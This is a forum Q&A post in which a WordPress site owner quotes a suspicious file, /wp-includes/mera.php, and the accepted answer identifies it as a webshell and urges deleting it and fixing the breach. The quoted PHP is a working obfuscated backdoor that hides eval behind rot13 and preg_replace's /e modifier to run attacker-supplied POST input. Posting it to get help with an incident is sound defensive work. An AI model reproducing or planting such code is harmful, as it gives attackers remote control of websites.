doulao1966 2016-08-18 07:37
浏览 118
已采纳

WordPress网站被黑了? 可疑的PHP文件

I found a suspicious PHP file /wp-includes/mera.php

Content:

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>

Could @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); possibly do something malicious?

  • 写回答

3条回答 默认 最新

  • duanbin3021 2016-08-18 08:52
    关注

    Delete the file instantly!

    This PHP code is a modified webshell. Those could be used to atack other websites and could lead to serious legal problems!

    After deletion you should also fix the leak that let the file in!

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(2条)

报告相同问题?